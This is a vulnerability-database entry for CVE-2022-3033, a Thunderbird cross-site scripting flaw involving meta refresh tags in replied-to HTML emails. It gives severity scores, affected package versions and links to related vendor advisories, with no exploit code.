CVE-2022-3033Cross-site Scripting in Mozilla Thunderbird

CWE-79Cross-site ScriptingCWE-200Sensitive Information ExposureCWE-668Resource ExposureCWE-94Code Injection15 documents7 sources
Severity
8.1HIGHNVD
OSV8.8
EPSS
0.7%
top 27.00%
CISA KEV
Not in KEV
Exploit
No known exploits
Affected products
3
Mozilla ThunderbirdDebian ThunderbirdMozilla Firefox
Timeline
PublishedDec 22

Description

If a Thunderbird user replied to a crafted HTML email containing a meta tag, with the meta tag having the http-equiv="refresh" attribute, and the content attribute specifying an URL, then Thunderbird started a network request to that URL, regardless of the configuration to block remote content. In combination with certain other HTML elements and attributes in the email, it was possible to execute JavaScript code included in the message in the context of the message compose document. The JavaScri

CVSS vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:NExploitability: 2.8 | Impact: 5.2

Affected Packages6 packages

debiandebian/thunderbird< thunderbird 1:102.2.1-1 (bookworm)+1
CVEListV5mozilla/thunderbirdunspecified102.5.1
NVDmozilla/thunderbird102.0102.2.1+2
Debianmozilla/thunderbird< 1:102.6.0-1~deb11u1+6
Ubuntumozilla/thunderbird< 1:102.2.2+build1-0ubuntu0.18.04.1+2

🔴Vulnerability Details

5
OSV
CVE-2022-3033: If a Thunderbird user replied to a crafted HTML email containing a meta tag, with the meta tag having the http-equiv="refresh" attribute, and the cont2022-12-22
GHSA
GHSA-gvhr-fq94-q7h9: If a Thunderbird user quoted from an HTML email, for example by replying to the email, and the email contained either a VIDEO tag with the POSTER attr2022-12-22
GHSA
GHSA-q68w-fq74-6jp9: If a Thunderbird user replied to a crafted HTML email containing a meta tag, with the meta tag having the http-equiv="refresh" attribute, and the cont2022-12-22
OSV
CVE-2022-45414: If a Thunderbird user quoted from an HTML email, for example by replying to the email, and the email contained either a VIDEO tag with the POSTER attr2022-12-22
OSV
thunderbird vulnerabilities2022-10-07

📋Vendor Advisories

8
Red Hat
Mozilla: Quoting from an HTML email with certain tags will trigger network requests and load remote content, regardless of a configuration to block remote content2022-11-30
Ubuntu
Thunderbird vulnerabilities2022-10-07
Red Hat
Mozilla: Leaking of sensitive information when composing a response to an HTML email with a META refresh tag2022-08-31
Debian
CVE-2022-3033: thunderbird - If a Thunderbird user replied to a crafted HTML email containing a <code>meta</c...2022
Debian
CVE-2022-45414: thunderbird - If a Thunderbird user quoted from an HTML email, for example by replying to the ...2022
CVE-2022-3033 — Cross-site Scripting in Mozilla | cvebase